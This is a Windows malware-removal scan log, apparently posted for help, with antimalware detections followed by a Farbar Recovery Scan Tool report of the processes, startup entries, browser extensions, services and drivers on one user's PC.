[Tr.Generic][File] C:\Users\Nathan\AppData\Roaming\uTorrent\updates\3.4.8_42548\utorrentie.exe -> Deleted
[Tr.Generic][File] C:\Users\Nathan\AppData\Roaming\uTorrent\updates\3.4.8_42576\utorrentie.exe -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUP][Chrome:Addon] Default : Grammarly for Chrome [kbfnbcaeplbcioakkpcpgfkobkghlhen] -> Not selected

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Samsung SSD 850 EVO 1TB +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 953303 MB
User = LL1 ... OK
User = LL2 ... OK

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 07-12-2016
Ran by Nathan (administrator) on DESKTOP-5GKAVDH (12-12-2016 14:52:04)
Running from C:\Users\Nathan\Downloads
Loaded Profiles: Nathan (Available Profiles: Nathan)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
(CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\Windows\Runservice.exe
(IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\n360.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
(SuperBoost Software) C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe
() C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\n360.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
() C:\Program Files\Elgato\SoundCapture\SoundCapture.exe
(Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.winxp\steamwebhelper.exe
(CyberGhost S.R.L.) C:\Program Files\CyberGhost 5\CyberGhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.99\nacl64.exe
(Spotify Ltd) C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
Failed to access process -> chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.winxp\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\conathst.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7640944 2014-09-29] (Realtek Semiconductor)
HKLM\...\Run: [MouseDriver] => TiltWheelMouse.exe
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Elgato Sound Capture] => C:\Program Files\Elgato\SoundCapture\SoundCapture.exe [1259520 2016-09-15] ()
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14011120 2016-12-09] (Zemana Ltd.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565960 2016-11-11] (LogMeIn Inc.)
HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 5\CyberGhost.exe [426600 2016-01-11] (CyberGhost S.R.L.)
HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Run: [GoogleChromeAutoLaunch_03D75E4CDB7EC9B07D7B1096AAC5AF87] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [921192 2016-11-08] (Google Inc.)
HKU\S-1-5-21-497135639-785806308-2055428636-1005\...\Run: [Spotify Web Helper] => C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-09] (Spotify Ltd)
HKU\S-1-5-18\...\Run: [] => 0
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\buShell.dll [2016-11-12] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\buShell.dll [2016-11-12] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\buShell.dll [2016-11-12] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-13] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-13] ()
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-13] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-13] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-13] ()
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nathan\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-13] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{26bfb920-b605-4d1a-9e13-7e0b6b4248f0}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{979c224b-a293-4c21-9c35-329a8c3a1f40}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=22.5.5.15
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-497135639-785806308-2055428636-1005 -> {28722CE2-68A3-41C1-8330-DE37007A4B21} URL = hxxps://uk.search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-497135639-785806308-2055428636-1005 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NSBU&chn=1000&geo=GB&ver=22&locale=en_GB&guid=5FD20738-043C-4D68-B218-212BEE06E9EB&doi=2016-09-01&gct=kwd&qsrc=2869
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\coIEPlg.dll [2016-11-12] (Symantec Corporation)
BHO: Virtual DJ Toolbar -> {D4027C7F-154A-4066-A1AD-4243D8127440} -> "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\VDJ\Passport_x64.dll" => No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\coIEPlg.dll [2016-11-12] (Symantec Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\coIEPlg.dll [2016-11-12] (Symantec Corporation)
Toolbar: HKLM - Virtual DJ Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\VDJ\Passport_x64.dll" No File
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\coIEPlg.dll [2016-11-12] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-497135639-785806308-2055428636-1005 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.8.1.14\coIEPlg.dll [2016-11-12] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Nathan\AppData\Roaming\Mozilla\Firefox\Profiles\ualmdavr.default-1470240871461 [2016-12-11]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ualmdavr.default-1470240871461 -> Google
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ualmdavr.default-1470240871461 -> Google
FF Extension: (Firefox Hotfix) - C:\Users\Nathan\AppData\Roaming\Mozilla\Firefox\Profiles\ualmdavr.default-1470240871461\Extensions\[email protected] [2016-12-07]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.4.24\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.4.24\coFFAddon [2016-12-07]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.4.24\coFFAddon
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-09-24] ()
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-24] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-04-29] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-04-29] (Intel Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default [2016-12-12]
CHR Extension: (Google Slides) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-05]
CHR Extension: (Google Docs) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-05]
CHR Extension: (Google Drive) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-05]
CHR Extension: (YouTube) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-05]
CHR Extension: (Norton Security Toolbar) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-12-03]
CHR Extension: (Steam Inventory Helper) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2016-12-11]
CHR Extension: (Google Search) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-05]
CHR Extension: (Google Sheets) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-05]
CHR Extension: (LoungeDestroyer) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghahcnmfjfckcedfajbhekgknjdplfcl [2016-10-18]
CHR Extension: (Google Docs Offline) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-18]
CHR Extension: (Norton Identity Safe) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-01-04]
CHR Extension: (Grammarly for Chrome) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2016-12-11]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2016-12-08]
CHR Extension: (TwitchAlerts Stream Labels) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kgmggmdngboajiakmbpdknfpdelbjbcg [2016-12-07]
CHR Extension: (SteamWizard) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\kojolejmgolbhakghocbgjemjgbmcjig [2016-09-02]
CHR Extension: (Skype) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-05]
CHR Extension: (Enhanced Steam) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg [2016-12-12]
CHR Extension: (Gmail) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-05]
CHR Extension: (Chrome Media Router) - C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-28]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\Exts\Chrome.crx [2016-11-17]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\Exts\Chrome.crx [2016-11-17]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2016-06-01] (Adobe Systems) [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2207960 2016-09-26] (Adobe Systems, Incorporated)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe [936728 2014-01-28] ()
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1457160 2016-11-27] ()
R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [65128 2016-01-11] (CyberGhost S.R.L)
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [284224 2016-12-06] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6625856 2016-11-10] (GOG.com)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [2627080 2016-11-11] (LogMeIn Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-04-29] (Intel Corporation)
R2 LicCtrlService; C:\Windows\runservice.exe [2560 2015-11-26] () [File not signed]
R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2960672 2016-07-20] (IObit)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-11-11] (LogMeIn, Inc.)
R2 N360; C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\N360.exe [289080 2016-11-12] (Symantec Corporation)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-11-17] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-11-17] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-11-17] (NVIDIA Corporation)
R2 NVIDIA Wireless Controller Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe [1163712 2016-11-17] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2119688 2016-12-06] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2180624 2016-12-06] (Electronic Arts)
S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [1316080 2016-11-23] (Overwolf LTD)
R2 sgbupt; C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe [2600256 2016-04-21] (SuperBoost Software)
R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe [39424 2016-02-10] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14011120 2016-12-09] (Zemana Ltd.)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-01-28] ()
R3 BCMWL63A; C:\WINDOWS\system32\DRIVERS\bcmwl63a.sys [11758840 2016-08-15] (Broadcom Corp)
S3 BEDaisy; C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [391144 2016-11-30] ()
R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\BASHDefs\20161208.001\BHDrvx64.sys [1874136 2016-11-07] (Symantec Corporation)
R1 ccSet_N360; C:\WINDOWS\system32\drivers\N360x64\1608010.00E\ccSetx64.sys [174328 2016-06-02] (Symantec Corporation)
S3 CMUSBDAC; C:\WINDOWS\system32\DRIVERS\CMUSBDAC.sys [3778592 2015-11-26] (C-MEDIA)
R3 CorsairVBusDriver; C:\WINDOWS\System32\drivers\CorsairVBusDriver.sys [47840 2016-01-20] (Corsair)
R3 CorsairVHidDriver; C:\WINDOWS\System32\drivers\CorsairVHidDriver.sys [21728 2016-01-20] (Corsair)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 ElgatoGC658Y; C:\WINDOWS\System32\Drivers\ElgatoGC658.sys [43488 2015-11-06] (UB658)
R3 ElgatoVAD; C:\WINDOWS\system32\DRIVERS\ElgatoVAD.sys [38152 2016-08-16] (Elgato Systems GmbH)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)
R3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [45680 2016-05-04] (LogMeIn Inc.)
R1 HWiNFO32; C:\WINDOWS\SysWoW64\drivers\HWiNFO64A.SYS [27552 2016-08-15] (REALiX(tm))
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\IPSDefs\20161208.005\IDSvia64.sys [1012952 2016-10-28] (Symantec Corporation)
S3 LcUvcUpper; C:\WINDOWS\system32\DRIVERS\LcUvcUpper.sys [37912 2015-09-21] (Microsoft Corporation)
R3 LifeCamTrueColor; C:\WINDOWS\system32\DRIVERS\LifeCamTrueColor.sys [37928 2016-07-27] (Microsoft Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_410e5247be0e5f00\nvlddmkm.sys [14174256 2016-11-17] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2016-11-17] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2016-11-17] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [936192 2016-08-15] (Realtek )
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [21360 2016-03-22] (IObit)
R1 SRTSP; C:\WINDOWS\System32\Drivers\N360x64\1608010.00E\SRTSP64.SYS [784624 2016-11-12] (Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\system32\drivers\N360x64\1608010.00E\SRTSPX64.SYS [49400 2016-11-12] (Symantec Corporation)
R0 SymEFASI; C:\WINDOWS\System32\drivers\N360x64\1608010.00E\SYMEFASI64.SYS [1628888 2016-11-12] (Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\N360x64\1608010.00E\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-17] (Symantec Corporation)
R1 SymIRON; C:\WINDOWS\system32\drivers\N360x64\1608010.00E\Ironx64.SYS [289520 2016-11-12] (Symantec Corporation)
